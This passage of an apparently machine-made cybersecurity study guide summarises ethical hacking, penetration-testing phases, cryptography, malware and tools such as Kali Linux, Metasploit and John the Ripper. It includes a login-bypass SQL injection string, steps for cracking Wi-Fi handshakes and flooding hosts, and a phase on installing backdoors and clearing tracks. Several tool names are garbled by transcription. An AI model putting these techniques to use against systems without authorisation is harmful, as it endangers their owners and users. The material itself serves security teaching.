    • Cryptanalysis: This is the process of decrypting a message without knowing the secret key. “decryption without the use of a secret key that is known as a crypt analysis crypto analysis is the reversing of an algorithm to figure out what the decryption was without using a key.”
    • Cryptanalysis Techniques: The source mentions three common techniques:
    • Brute Force Attack: Trying every possible key combination. “a brute force attack is trying every combination permutation and combination of the key to figure out what the key was it is 100% successful but may take a lot of time.”
    • Dictionary Attack: Using a list of potential keys (words). “a dictionary attack is where you have created a list of possible encryption mechanisms a list of possible cracks and then you try to figure out whether those cracks work or not.”
    • Rainbow Table Attack: Comparing encrypted text with pre-computed tables of hashes. “rainbow tables are where you have an encrypted text in hand and you’re trying to figure out uh the similarities between the text that you have and the encrypted data that you wanted to decrypt in the first place.”
    • Spam Mimic: The source demonstrates a tool that encodes messages into seemingly unrelated spam emails for obfuscation. “to begin with the demo of cryptography we are on a website called spammimic.com which will help us scramble the message that we created into a completely format which would be unrelated to the topic at hand so if I say I want to encode a message turn a short message into spam so what this does is want to send across a secret message you type in the secret message a short one and it will convert that into a spam mail you send it across so whoever is reading that spam mail would never get an idea of the embedded message within it.”

    3. Ethical Hacking:

    The source differentiates between ethical and malicious hackers and outlines the responsibilities of an ethical hacker.

    • White Hat vs. Black Hat: Security experts who work defensively are “white hat hackers,” while malicious attackers are “black hats.” “vulnerabilities and we report them back to the victim or to the client and help them uh patch those vulnerabilities that’s the main difference between a white hat and a black hat so security experts are normally termed as white hat hackers malicious hackers are termed as black hats.”
    • Responsibilities of an Ethical Hacker: These include:
    • Identifying and testing vulnerabilities. “first and foremost you have to create scripts test for vulnerabilities first have to identify those in the first place so there’s a vulnerability assessment identifying those vulnerabilities and then you’re going to test them to see the validity and the complexity of those vulnerabilities.”
    • Developing security tools and configurations. “your one of your responsibilities would be to develop tools to increase security as well or to configure security in such a way that it would be difficult to breach.”
    • Performing risk assessments. “performing risk assessment now what is a risk risk is a threat that is posed to an organization by a possibility of getting hacked… I do a risk assessment to identify which vulnerability is critical would have the most impact on the client and what would be the repercussions if those vulnerabilities actually get exploited.”
    • Setting up security policies. “another responsibility of the ethical hacker is to set up policies in such a way that it becomes difficult for hackers to get access to devices or to protected data.”
    • Training staff on network security. “and finally train the staff for network security so uh we got a lot of employees in an organization we need to train the staff of what is allowed and what is not allowed how to keep themselves secure so that they don’t get compromised thus becoming a vulnerability themselves to the organization.”
    • Implementing administrative policies like password policies. “the policies that we have talked about are administrative policies to govern the employees of the organization for example password policies most of the organizations will have a tough password policy where they say you have to create a password that meets a certain level of complexity before that can be accepted and till you create that password you’re not allowed to log in or you’re not allowed to register.”

    4. Penetration Testing:

    Penetration testing is a focused effort to exploit identified vulnerabilities in information systems.

    • Vulnerability Assessment as a Precursor: It involves scanning for potential flaws before attempting penetration. “now for penetration testing there is a phase called vulnerability assessment that happens before this vulnerability assessment is nothing but running a scanning tool to identify a list of potential flaws or vulnerabilities within the organization.”
    • Focus on Exploitation: Penetration testing aims to actively breach security defenses. “this is the part of ethical hacking where it specifically focuses on penetration only of the information systems… the essence of penetration testing is to penetrate information systems using various attacks.”
    • Attack Vectors: These can include phishing, password cracking, Denial of Service (DoS), and exploiting other identified vulnerabilities. “the attacks could be anything like a phishing attack a password cracking attack a denial of service attack or any other vulnerabilities that you have identified uh during the vulnerability scan.”

    5. Kali Linux:

    Kali Linux is highlighted as a popular operating system for both ethical and malicious hackers due to its pre-installed security tools.

    • Tool-Rich Distribution: It contains over 600 tools for penetration testing and security auditing. “what is Kali Linux and why is it used kali Linux is an operating system oftenly used by hackers and ethical hackers both because of the tool sets that the operating system contains it is a operating system created by professionals with a lot of embedded tools it is a DVN based operating system with advanced penetration testing and security auditing features there are more than 600 plus odd tools on that operating system that can help you leverage any of the attacks.”
    • Versatile Capabilities: These tools support various security tasks like man-in-the-middle attacks, sniffing, password cracking, computer forensics, reverse engineering, and information gathering. “contains like I said a hundred of hundreds of tools that are used for various information security tasks like uh computer forensics re reverse engineering information finding even uh getting access to different machines and then uh creating viruses worms to anything that you will 600 plus tools in the Kali Linux operating system.”
    • Key Features: Kali Linux is open-source, free, regularly updated, customizable, supports wireless network cards and multiple languages, and allows for creating custom attacking scripts and exploits.

    6. Phases of Penetration Testing:

    The source outlines five key phases of a penetration test:

    • Reconnaissance (Information Gathering): This crucial phase involves collecting as much information as possible about the target. “the first one is the reconnaissance phase also known as the information gathering phase this is the most important phase for any hacker this is where the hacker or the ethical hacker if you will will gather as much information about the targets victim or vice versa the vict the victim right… for example you want to find out the IP addresses the domains subdomains the network architecture that is being utilized you want to identify operating systems that are being utilized.”
    • Scanning: Using tools to identify open ports, services, and potential vulnerabilities based on the information gathered. “the second phase is the scanning phase once you have gathered enough information about the target you would then start probing the network or the devices that are within the scope of your test to identify open ports what services are running on those ports what operating systems and versions are being utilized by those machines.”
    • Gaining Access (Exploitation): Attempting to exploit identified vulnerabilities to gain unauthorized access to the system. “the third phase is gaining access based on the information gathered in the first two phases and the vulnerabilities that you have identified in the second phase you would then try to exploit those vulnerabilities to gain access to the system or the application this could involve using various techniques such as exploiting software flaws, weak passwords, or social engineering tactics.”
    • Maintaining Access (Post-Exploitation): Once access is gained, the focus shifts to maintaining that access and potentially escalating privileges. “the fourth phase is maintaining access once you have gained access to a system or an application you would want to maintain that access for a certain period of time to gather more information or to perform further actions this could involve installing back doors, creating new accounts, or pivoting to other systems within the network.”
    • Reporting: Documenting the findings, vulnerabilities exploited, and recommendations for remediation. “the final phase is reporting once the penetration test is complete you would document all of your findings, the vulnerabilities that you have exploited, the impact of those vulnerabilities, and your recommendations for remediation this report is then provided to the client to help them improve their security posture.”

    7. Vulnerability Assessment Examples:

    The source provides demonstrations of common vulnerabilities:

    • SQL Injection: This attack exploits vulnerabilities in how web applications handle user input to interact with databases. By injecting malicious SQL code, an attacker can bypass authentication or extract sensitive data. The demonstration shows how a simple SQL injection can bypass a login form (“single quote or 1= 1 space – space”) and how a different injection can dump database contents in a user lookup form (“single quote or 1= 1 space”). The source emphasizes that “the vulnerability will always lie in the application it is the developer’s prerogative of how to develop the application how to configure it to prevent SQL injection queries from happening.” Different types of SQL injection are mentioned: inband (error-based, union-based), blind (boolean-based, time-based), and out-of-band.
    • Password Cracking: The demonstration uses the “Kane enable” tool on a Windows 7 machine to extract password hashes and attempts to crack them using a brute-force attack. It highlights how Windows stores password hashes and the time-consuming nature of brute-force attacks.
    • Shellshock Vulnerability: The source demonstrates exploiting the Shellshock vulnerability on a Linux web server using Kali Linux and Metasploit. This involves using reconnaissance tools like Zenmap and Sparta to identify the target and the vulnerability, and then using Metasploit to execute a payload and gain remote access (“meterpreter session”).

    8. Network Security Measures:

    The document touches upon several network security technologies:

    • VPN (Virtual Private Network): VPNs encrypt internet traffic and mask the user’s IP address, enhancing privacy and security, especially on public Wi-Fi. The example of Jude at the airport illustrates the risks of using public Wi-Fi without a VPN, where a hacker could intercept her bank transaction details. “bank officials advise her to use a VPN for future transactions especially when connecting to an open or public network.” The process involves the user’s computer connecting to the ISP, then to the VPN server (which encrypts the data and provides a new IP address), and finally to the target server.
    • Tor (The Onion Router): Tor is presented as a network that anonymizes internet traffic by routing it through multiple relays. It hides the user’s IP address and location. The demonstration shows how to use the Tor Browser, check the apparent IP address and location, and access “.onion” websites (hidden services). “the tour browser is a very effective way of anonymizing your internet activity it works by routing your traffic through multiple relays across the world encrypting it at each step and making it very difficult to trace your original IP address or your location.”
    • Firewalls: Firewalls act as virtual walls, filtering incoming and outgoing network traffic based on predefined rules. They protect devices from unauthorized access and malicious data packets. “firewalls are security devices that filter the incoming and outgoing traffic within a private network… the firewall works like a gatekeeper at your computer’s entry point which only welcomes incoming traffic that it has been configured to accept.” Different types of firewalls are mentioned: packet filtering, stateful inspection, and proxy firewalls.

    9. Malware:

    The source discusses different types of malware:

    • Viruses: These are malicious programs that attach themselves to other files and replicate. Types discussed include boot sector viruses (affecting system startup), macro viruses (embedded in documents), and direct action viruses (activate upon execution and then exit). “for the first part we saw the main objective of the virus is to harm the data and information in a system… viruses have the ability to replicate itself to harm multiple files whereas Trojan does not have the replication ability.” Detection methods include system slowdowns, application freezes, data corruption, unexpected logouts, and frequent crashes. The MYDOOM virus is mentioned as a famous example.
    • Trojans: Trojans disguise themselves as legitimate software but perform malicious actions once executed. Types discussed include backdoor Trojans (providing remote access), click fraud Trojans (generating fraudulent clicks), and ransomware Trojans (blocking access and demanding payment). “for the Trojan we have stealing of the data files and information… Trojan horses are remote accessed and lastly viruses have the ability to replicate itself to harm multiple files whereas Trojan does not have the replication ability.” Detection includes frequent crashes, slow reaction times, random pop-ups, and changes in system applications and desktop appearance. The Emotet Trojan is mentioned for financial theft.
    • Botnets: These are networks of infected devices (bots) controlled remotely by an attacker (bot herder) to perform large-scale attacks like data theft, server failures, malware propagation, and DoS attacks. The creation process involves preparing the botnet army (infecting devices), establishing connection to the control server, and launching the attack. Architectures include client-server and peer-to-peer models. The Mirai and Zeus botnets are given as examples.

    10. Denial of Service (DoS) Attacks:

    DoS attacks aim to disrupt services by overwhelming a target with traffic, making it unavailable to legitimate users. “a denial of service attack is an attack that aims to make a computer or a network resource unavailable to its intended users by disrupting the service of a host connected to the internet.” The source explains Distributed Denial of Service (DDoS) attacks involve multiple compromised systems launching attacks simultaneously. Mitigation techniques include over-provisioning bandwidth and using a Content Delivery Network (CDN). A demonstration using the “hping3” tool from Parrot Security to flood a Linux Light virtual machine with SYN packets showcases the impact of a DoS attack.

    11. Wi-Fi Hacking:

    The source demonstrates capturing Wi-Fi handshakes and attempting to crack passwords using tools within Kali Linux (likely Aircrack-ng suite, although “Air Garden” is mentioned as a multi-use bash script). The process involves using tools to monitor wireless networks, capture the WPA/WPA2 handshake during authentication, and then using brute-force or dictionary attacks to try and decrypt the handshake file and reveal the Wi-Fi password.

    12. Security Tools (Beyond Kali Specifics):

    The source briefly introduces several key security tools:

    • Wireshark: A network protocol analyzer used for capturing and analyzing network traffic at a microscopic level, aiding in real-time or offline network analysis and identifying traffic patterns. “Wireshark is a popular open-source tool to capture network packets and converts them to human readable binary format it provides every single detail of the organization’s network infrastructure it consists of devices designed to help measure the ins and outs of the network.”
    • Air Garden: Described as a multi-use bash script for Linux systems to hack and audit wireless networks, capable of launching DoS attacks and supporting various Wi-Fi hacking methods.
    • John the Ripper: An open-source password security auditing and recovery tool supporting numerous hash and cipher types, utilizing dictionary attacks and brute-forcing. “john the Ripper is an open-source password security auditing and password recovery tool available for many operating systems john the Ripper Jumbo supports hundred of hash and cipher types including for user passwords of operating systems web apps groupware database servers network traffic captures encrypted private keys file systems and document files.”
    • Nmap (Network Mapper): A network scanning tool using IP packets to identify devices, open ports, services, and operating systems on a network.
    • Burp Suite: A powerful tool for web application security testing, used for configuring proxies, intercepting and inspecting traffic, and identifying vulnerabilities.
    • Metasploit Framework: A penetration testing tool used for exploit development and execution against identified vulnerabilities, providing a platform for launching attacks and gaining access to systems.

    13. Cryptography Algorithms in Detail:

    The source delves deeper into specific cryptographic algorithms:

    • Hashing: A process that creates a fixed-size output (hash value) from variable-sized input data. Hash functions are generally not reversible without extensive brute-force efforts and are useful for storing passwords securely by comparing hash values instead of plain text.
    • Symmetric Cryptography: Uses the same key for both encryption and decryption.
    • DES (Data Encryption Standard): An older symmetric block cipher with a 56-bit key. Despite its past prominence, its short key length makes it vulnerable to brute-force attacks. The source explains the Feistel structure it uses, involving multiple rounds of substitution and permutation. Different modes of operation (ECB, CBC, CFB, OFB, Counter) are also discussed. Its dominance ended in 2002 when AES replaced it as the standard.
    • AES (Advanced Encryption Standard): A symmetric block cipher with 128-bit block size and key sizes of 128, 192, or 256 bits. It became the NIST standard in 2002 due to DES’s short key length.
    • Asymmetric Cryptography: Uses separate keys for encryption (public key) and decryption (private key).
    • RSA: A public-key signature algorithm and encryption/decryption algorithm. The source explains the key generation process involving two large prime numbers, and the encryption and decryption formulas. It can be used for both securing data exchange and verifying digital signatures.
    • Digital Signatures: Used to verify the authenticity and integrity of data.
    • DSA (Digital Signature Algorithm): A public key signature algorithm. The source outlines the key generation, signature generation (using a hash function and random integer), and signature verification processes. It highlights DSA’s robustness and faster key generation compared to RSA.

    14. Ethical Considerations and AI in Cyber Security:

    The document touches upon the ethical use of hacking techniques, emphasizing the importance of permission and controlled environments. It also introduces “HackerGPT,” an AI language model trained in cybersecurity, capable of answering questions, providing code snippets for tasks like port scanning and log monitoring, and explaining security concepts like SQL injection and Burp Suite configuration. This suggests the growing role of AI in both offensive and defensive cybersecurity practices.

    15. Penetration Testing Methodologies (Types):

    The source categorizes penetration testing based on the tester’s knowledge of the system:

    • Black Box Testing: The tester has no prior knowledge, simulating an external attacker.
    • White Box Testing: The tester has full access to system details, simulating an insider threat or a highly informed attacker.
    • Gray Box Testing: The tester has partial knowledge, such as user credentials or limited architecture details.

    16. Installation of Security Tools on Kali Linux:

    The document provides a practical guide to installing essential penetration testing tools on Kali Linux using the sudo apt install command. Tools mentioned include Nmap, Whois, Dig (DNS utilities), Nikto, WPScan, OpenVAS (Greenbone Vulnerability Manager), and Metasploit Framework. It also demonstrates checking the versions of some of these tools.

    Conclusion:

    The provided source material offers a comprehensive overview of various cybersecurity concepts, ranging from social engineering tactics to advanced cryptographic algorithms and practical penetration testing methodologies. It highlights the importance of understanding both offensive and defensive security techniques and introduces the role of specialized tools like Kali Linux and the emerging influence of AI in the field. The inclusion of practical demonstrations and tool installation guides provides a valuable introduction to hands-on cybersecurity practices, albeit within ethical and controlled environments.

    General Cyber Security Concepts

    • What are some common social engineering tactics used in cyber attacks? Social engineering exploits human psychology to gain access to systems or information. Common tactics include phishing (fraudulent emails from trusted sources), exploiting curiosity (leaving infected USB drives in public places), and exploiting greed (Nigerian scams, fake lotteries). Attackers often impersonate legitimate entities or create seemingly plausible scenarios to trick individuals into divulging sensitive data or performing malicious actions. Verifying the authenticity of requests and being cautious about unsolicited offers are crucial defenses against these tactics.
    • What is encryption and why is it important for data security? Encryption is the process of scrambling data using a specific algorithm (cryptography) so that it becomes unreadable to unauthorized users. The original data can only be restored (decrypted) by someone possessing the correct key. Encryption is a fundamental security mechanism for keeping data private and secure, especially when transmitted over networks. Even if data is intercepted, without the decryption key, it remains nonsensical to the attacker. Various algorithms exist, and their complexity determines the difficulty of breaking the encryption.
    • What is cryptanalysis and what are some common techniques used in it? Cryptanalysis is the process of decrypting encrypted data (ciphertext) without knowing the secret key. It involves reversing the encryption algorithm to figure out the original message. Common cryptanalysis techniques include brute-force attacks (trying every possible key combination), dictionary attacks (using a list of potential passwords or keys), and rainbow table attacks (comparing ciphertext with pre-calculated hashes to find matches). The success and time required for these techniques vary depending on the strength of the encryption and the resources available to the attacker.
    • What are the differences between white hat, black hat, and gray hat hackers? Hackers are often categorized by their ethical intentions. White hat hackers (ethical hackers) use their skills to identify vulnerabilities in systems and networks with the permission of the owner, with the goal of improving security. They perform penetration testing and report findings to help organizations patch weaknesses. Black hat hackers, on the other hand, use their skills for malicious purposes, such as stealing data, disrupting services, or financial gain, without authorization. Gray hat hackers operate in a less defined area; they may sometimes act without permission but without malicious intent, often disclosing vulnerabilities they find publicly or to the affected organization.

    Ethical Hacking and Penetration Testing

    • What is penetration testing and what are the typical phases involved? Penetration testing is a specific type of ethical hacking that focuses on actively attempting to penetrate information systems using various attack methods. The goal is to identify and exploit vulnerabilities to assess the security posture of a system or network. The typical phases of penetration testing include:
    1. Reconnaissance (Information Gathering): Collecting as much information as possible about the target, including IP addresses, domains, network architecture, and operating systems.
    2. Scanning: Using tools to identify open ports, services running, and potential vulnerabilities based on the information gathered.
    3. Exploitation: Attempting to exploit the identified vulnerabilities to gain unauthorized access to the system or data.
    4. Post-Exploitation: Once access is gained, exploring the compromised system to understand the extent of the breach and potential impact.
    5. Reporting: Documenting the findings, including the vulnerabilities identified, the methods used to exploit them, and recommendations for remediation.
    • What is SQL injection and how can it be exploited? SQL injection is a web application vulnerability that allows an attacker to inject malicious SQL code into an application’s database queries. This can happen when user input is not properly sanitized before being used in a SQL query. By crafting malformed queries, attackers can bypass authentication, extract sensitive data, modify database content, or even execute arbitrary commands on the database server. Exploitation often involves using special SQL characters and operators (like single quotes, OR, 1=1) in input fields to manipulate the logic of the queries sent to the database. Different types of SQL injection attacks exist, including in-band (error-based and union-based), blind (boolean-based and time-based), and out-of-band.
    • What is a Denial of Service (DoS) attack and how can it impact a system or network? A Denial of Service (DoS) attack is an attempt to make a machine or network resource unavailable to its intended users by disrupting the service of a host connected to the internet. This is typically achieved by flooding the target with superfluous requests in an attempt to overload systems and prevent some or all legitimate requests from being fulfilled. A Distributed Denial of Service (DDoS) attack uses multiple compromised computer systems to attack a single target, amplifying the impact. DoS/DDoS attacks can lead to service outages, financial losses, and reputational damage. Mitigation strategies include over-provisioning bandwidth, using Content Delivery Networks (CDNs), and implementing traffic filtering and rate limiting.
    • What is Wi-Fi hacking and what tools are commonly used for it? Wi-Fi hacking refers to the process of attempting to gain unauthorized access to a wireless network. Common tools used for this purpose include Aircrack-ng (a suite of tools for packet sniffing, password cracking, and more), and tools within Kali Linux. Techniques often involve capturing the WPA/WPA2 handshake (a four-way exchange that occurs when a device connects to a Wi-Fi network) and then attempting to crack the password offline using brute-force or dictionary attacks. These tools can also be used for legitimate security auditing of wireless networks to identify vulnerabilities. It’s crucial to have permission before attempting to audit or penetrate any wireless network.

    Cyber Security Fundamentals: A Comprehensive Overview

    Cyber security fundamentals revolve around the essential principles and practices designed to protect computer systems, networks, and digital information from unauthorized access, use, disclosure, disruption, modification, or destruction. In today’s digital world, where cyber threats are pervasive, cyber security has become more critical than ever.

    Here are some fundamental aspects of cyber security discussed in the sources:

    • The Importance of Cyber Security: With the increasing number of cyber threats, safeguarding networks, applications, and data is a top priority. The demand for skilled cyber security professionals, particularly ethical hackers, is expected to grow significantly. Companies across various industries need these professionals to secure their systems. The potential financial impact of cyber attacks, such as ransomware attacks, which cost institutions billions of dollars, underscores the necessity of robust cyber security measures.
    • Ethical Hacking as a Core Component: Ethical hacking involves using the same tools and techniques as malicious hackers to identify and fix security vulnerabilities before they can be exploited. Ethical hackers, also known as white hat hackers, work with the permission of the system owner to stress-test their platforms and strengthen security. This proactive approach helps organizations prevent data breaches and save billions of dollars.
    • Understanding Threat Actors: It’s crucial to understand the different types of hackers.
    • Black hat hackers exploit security vulnerabilities for monetary gain, often stealing or destroying data. They operate with malicious intent and try to remain anonymous.
    • White hat hackers (ethical hackers) use their skills to identify and remedy security flaws to help organizations improve their security posture. They are authorized to act on the company’s behalf.
    • Grey hat hackers are a blend of both, who may snoop on systems without consent but inform the owner of vulnerabilities, sometimes for a fee.
    • Script kiddies rely on existing hacking tools without much technical understanding.
    • Nation-sponsored hackers are employed by governments for espionage and other purposes.
    • Core Concepts: A thorough introduction to cyber security involves learning the basic terminology, different types of threats, how these threats work, and the fundamental working principles.
    • Networking Fundamentals: A strong grasp of how the internet works, including operating systems, TCP/IP, OSI model, routing, and switching, is absolutely essential for entering the field of cyber security. Understanding network protocols (e.g., TCP/IP), network security principles, and firewall configurations is fundamental for identifying vulnerabilities.
    • Operating Systems Proficiency: Proficiency in various operating systems like Windows, Linux, and macOS is crucial. It allows cyber security professionals to safeguard the fault lines across different platforms as they directly interact with these systems daily.
    • Cryptography: Knowledge of cryptography, including encryption, decryption, cryptographic algorithms, and protocols, is very important in cyber security. Cryptography is the science of securing data through encryption to prevent unauthorized access. Techniques like AES encryption are used to scramble data, making it difficult for attackers to crack.
    • Risk Management: Understanding risk assessment, mitigation strategies, and compliance frameworks like GDPR and HIPAA is a key aspect of cyber security.
    • Cyber Security Laws and Ethics: Awareness of legal and ethical considerations in cyber security is also fundamental.
    • Essential Security Technologies: Familiarity with security technologies such as firewalls, intrusion detection and prevention systems (IDPS), antivirus software, and endpoint security is necessary. Firewalls monitor network traffic and block unauthorized access based on security rules.
    • Vulnerability Assessment and Penetration Testing: Hands-on experience with tools like Nessus, Metasploit, NMAP, and Burp Suite is crucial for identifying and exploiting vulnerabilities to improve security. Penetration testing simulates real-world attacks to uncover weaknesses in systems and networks.
    • Incident Response: Understanding security operations, incident response, threat hunting, log analysis, and Security Information and Event Management (SIEM) is vital for handling security breaches. Collecting system logs is a critical part of incident response and forensic analysis.
    • Secure Coding Practices: Knowledge of secure software development practices and common vulnerabilities like OWASP Top 10 is important for preventing security flaws in applications.
    • Staying Updated: The field of cyber security is constantly evolving, so staying updated with the latest threats and attack methodologies is crucial for effective defense.

    In summary, cyber security fundamentals encompass a broad range of technical knowledge, ethical considerations, and practical skills aimed at protecting digital assets from a growing landscape of cyber threats. A strong foundation in networking, operating systems, cryptography, and ethical hacking principles forms the bedrock of a successful career in this critical field.

    Understanding Ethical Hacking Principles and Practices

    Ethical hacking encompasses a range of concepts centered around proactively identifying and mitigating security vulnerabilities in computer systems, networks, and applications with the permission of the owner. It involves using the same tools and techniques as malicious hackers, but with the intent to improve security rather than to cause harm or personal gain.

    Here are some key ethical hacking concepts discussed in the sources:

    • Definition and Purpose: Ethical hacking is the process of taking security measures to safeguard data and networks from malicious cyber attacks. Ethical hackers use every tool at their disposal to try and breach security barriers and find potential vulnerabilities. The core purpose is to discover weaknesses or vulnerabilities in information systems in a legal and ethical manner. By identifying these flaws, ethical hackers help organizations to strengthen their defenses and protect against real cyber threats.
    • Ethical vs. Malicious Hacking: The key differentiator between ethical (white hat) and malicious (black hat) hacking lies in intent and authorization.
    • Black hat hackers exploit security vulnerabilities for monetary gain, aiming to steal or destroy private data, alter websites, or disrupt networks. They have malicious intent and try to hide their identities.
    • White hat hackers (ethical hackers) perform the same activities but with the consent of the system owner and with the goal of identifying and remedying security flaws. Their intent is to help the organization and improve its security posture.
    • Types of Hackers: Beyond black and white hats, there are also grey hat hackers who operate in a more ambiguous space, potentially snooping without consent but informing owners of vulnerabilities. Script kiddies use existing tools without deep technical understanding. Nation-sponsored hackers conduct cyber activities on behalf of governments, and hacktivists use hacking to promote political agendas. Ethical hacking primarily falls under the domain of white hat activities.
    • Roles and Responsibilities of an Ethical Hacker: Ethical hackers have several responsibilities, including:
    • Conducting security assessments to identify an organization’s security posture by evaluating existing security controls.
    • Identifying and testing vulnerabilities in systems, networks, and applications.
    • Developing tools and scripts to enhance security or to test for vulnerabilities.
    • Performing risk assessments to determine the potential impact of identified vulnerabilities.
    • Developing and recommending security policies.
    • Providing guidance on mitigating or resolving identified weaknesses.
    • Potentially training staff on network security best practices.
    • Documenting findings and compiling detailed reports on vulnerabilities and recommendations.
    • The Ethical Hacking Process: The typical ethical hacking process involves several phases:
    • Reconnaissance (Information Gathering): Collecting as much information as possible about the target system or organization, including network infrastructure, operating systems, and potential weak points. Tools like Nmap and Netdiscover can be used in this phase.
    • Scanning: Identifying open ports, services, and potential vulnerabilities using tools like Nmap and vulnerability scanners like Nessus.
    • Gaining Access (Exploitation): Attempting to exploit identified vulnerabilities to gain unauthorized access to the system or network, often using tools like Metasploit.
    • Maintaining Access: Establishing mechanisms to retain access to the compromised system for further analysis, which might involve installing backdoors or Trojans.
    • Clearing Tracks: Removing any evidence of the hacking activity to avoid detection.
    • Reporting: Documenting all findings, the vulnerabilities discovered, the exploitation process, and providing recommendations for remediation.
    • Essential Skills and Knowledge: A successful ethical hacker requires a diverse set of skills:
    • Strong knowledge of computer networks and protocols (TCP/IP, HTTP, etc.).
    • Proficiency in operating systems such as Windows, Linux, and macOS, including their server versions.
    • Understanding of programming and scripting languages like Python, Java, C++, PHP, Ruby, HTML, and JavaScript for developing scripts, automating tasks, and understanding web applications.
    • Knowledge of web applications and databases, including common vulnerabilities like SQL injection and cross-site scripting (XSS).
    • Familiarity with security technologies like firewalls, intrusion detection/prevention systems (IDS/IPS), antivirus software, and endpoint security.
    • Understanding of cryptography, including encryption and decryption techniques.
    • Awareness of common attack vectors and techniques, including malware, social engineering, and network attacks.
    • Strong problem-solving and analytical thinking skills.
    • Awareness of cyber security laws and ethics.
    • Ethical Hacking Tools: Ethical hackers utilize a wide range of tools for various tasks:
    • Network Scanners: Nmap is a key tool for network discovery and port scanning.
    • Vulnerability Scanners: Nessus and Acunetix are used to identify potential vulnerabilities in systems and web applications.
    • Penetration Testing Frameworks: Metasploit is a powerful framework with a vast collection of exploits for testing vulnerabilities.
    • Packet Analyzers: Wireshark is used to capture and analyze network traffic.
    • Password Cracking Tools: John the Ripper is used for dictionary attacks and brute-force password cracking.
    • Web Application Testing Tools: Burp Suite is a popular tool for testing web application security.
    • SQL Injection Tools: SQLmap automates the process of detecting and exploiting SQL injection vulnerabilities.
    • Kali Linux is a popular Linux distribution specifically designed for penetration testing, containing hundreds of pre-installed ethical hacking tools.
    • Social Engineering: This is a non-technical hacking technique that involves manipulating humans into revealing confidential information or performing actions that compromise security. Common social engineering tactics include phishing, pretexting, and exploiting human curiosity or greed.
    • Importance and Benefits for Organizations: Ethical hacking is crucial for organizations to proactively identify and address security weaknesses before malicious actors can exploit them. This helps in preventing data breaches, minimizing financial losses, and protecting reputation. Regular security audits conducted by ethical hackers help organizations stay ahead of cyber threats and ensure the integrity of their digital infrastructure.
    • Certifications: Obtaining certifications like Certified Ethical Hacker (CEH), Offensive Security Certified Professional (OSCP), and CompTIA Security+ can validate an ethical hacker’s skills and enhance their credibility.
    • Job Roles: The field of ethical hacking offers various job roles, including Ethical Hacker, Penetration Tester, Network Security Engineer, Cyber Security Analyst, Information Security Manager, Security Consultant, and Cyber Security Engineer.
    • Ethical Hacking and Penetration Testing: While often used interchangeably, penetration testing is a specific subset of ethical hacking that focuses on actively attempting to penetrate information systems using various attack methods. Ethical hacking is a broader field that encompasses not only penetration testing but also vulnerability assessments, policy development, and other proactive security measures.

    By understanding these concepts, individuals and organizations can better appreciate the role and importance of ethical hacking in the ongoing battle against cyber threats.

    Security Testing Tools for Ethical Hacking

    Security testing tools are essential for ethical hackers and security professionals to identify, analyze, and exploit vulnerabilities in computer systems, networks, and applications. These tools enable a proactive approach to security, allowing organizations to strengthen their defenses before malicious actors can cause harm.

    Here is a discussion of various security testing tools mentioned in the sources:

    1. Vulnerability Scanners:

    • Nessus: This is an automated vulnerability scanner designed to identify security weaknesses within hosts, operating systems, and networks. It uses a built-in database of known vulnerabilities and scans the target environment to find potential flaws. Ethical hackers use Nessus to discover a list of potential vulnerabilities that can then be further investigated.
    • Acunetix and Arachnne: These are examples of application scanners that focus on identifying flaws specifically within web applications. They help security testers understand potential weaknesses like SQL injection or cross-site scripting.
    • OpenVAS (Greenbone Vulnerability Manager): This tool provides a comprehensive vulnerability management system, performing scans to detect vulnerabilities across the target.
    • Netsparker: This is another automated web application security scanner that is configurable and helps secure web applications by identifying reported vulnerabilities.

    2. Penetration Testing Frameworks and Tools:

    • Metasploit: This is a powerful penetration testing framework widely used by both ethical hackers and malicious actors. It contains a vast collection of readymade and custom exploits that can be used to probe for and exploit systemic vulnerabilities in networks and servers. Ethical hackers use Metasploit to validate vulnerabilities identified by scanners and to simulate real-world attacks by crafting or choosing appropriate exploits. It can be used to gain access, and depending on the vulnerability, even run root commands.
    • Burp Suite Professional: This is a popular proxy-based tool used for penetration testing and finding vulnerabilities in web applications. It allows for the evaluation of web application security through hands-on testing.

    3. Network Analysis Tools:

    • Nmap (Network Mapper): This is a free and open-source utility for network discovery and security auditing. It can identify live hosts on a network, the services they are running, their operating systems, and the types of packet filters and firewalls in use. Ethical hackers use Nmap in the early reconnaissance phase to understand the target’s network infrastructure and identify potential entry points through open ports and services.
    • Wireshark: This is a free and open-source packet analyzer used for network troubleshooting, analysis, and security auditing. It captures network traffic at a microscopic level, allowing for detailed analysis of data packets. Ethical hackers use Wireshark to monitor network traffic during vulnerability scans and exploitation attempts, helping them understand the communication flow and analyze the success of their attacks.

    4. Specific Attack Tools:

    • SQLmap (SQL map): This is an automated tool specifically designed for detecting and exploiting SQL injection vulnerabilities in web applications. It can automatically craft and execute SQL injection queries to test for flaws and potentially retrieve data from databases.
    • John the Ripper: This is an open-source password security auditing and password recovery tool. It supports various password cracking techniques, including dictionary attacks and brute-force attacks, to test the strength of passwords.
    • Air Garden: This is a multi-use bash script for Linux systems used for hacking and auditing wireless networks. It can be used to launch denial-of-service attacks on Wi-Fi networks and supports various Wi-Fi hacking methods like WPS hacking and handshake captures.

    5. Operating Systems for Security Testing:

    • Kali Linux: This is a Debian-based Linux distribution specifically designed for penetration testing and security auditing. It comes with hundreds of pre-installed tools targeted towards various information security tasks, including vulnerability assessment, penetration testing, computer forensics, and reverse engineering. Its features, pre-installed tools, and customizability make it a popular choice for ethical hackers.

    The Role of Security Testing Tools in Ethical Hacking:

    Ethical hackers utilize these tools throughout the different phases of penetration testing:

    • Reconnaissance: Tools like Nmap are used to gather information about the target network and systems.
    • Scanning: Nmap is further used for port scanning, and vulnerability scanners like Nessus and Acunetix are employed to identify potential weaknesses.
    • Gaining Access: Metasploit is a key tool in this phase, used to exploit identified vulnerabilities. Tools like SQLmap and password cracking tools like John the Ripper might also be used depending on the identified flaws.
    • Maintaining Access: While not explicitly a “tool,” understanding operating system functionalities for installing backdoors (as mentioned in the context of malicious hackers) is relevant, although ethical hackers focus on reporting such potential avenues rather than maintaining unauthorized access long-term in a real audit.
    • Reporting: While there isn’t a specific tool listed for reporting, the output and findings from all the above tools are crucial for generating a comprehensive security assessment report.

    It’s important to note that the essence of ethical hacking goes beyond simply running automated tools. Ethical hackers need to understand the reports generated by these tools, analyze the findings, and potentially craft their own exploits or use existing ones in a specific manner to bypass security controls. They also need to be aware of security laws and standards to ensure their testing activities are legal and ethical.

    Network Security Core Principles and Key Tools

    Based on the sources, several key principles underpin network security. Network security is a set of technologies and processes aimed at protecting the usability, integrity, and confidentiality of a company’s network infrastructure and the data transmitted and stored within it. It involves preventing unauthorized access, misuse, modification, or destruction of the network and its resources.

    Here are some core network security principles derived from the sources:
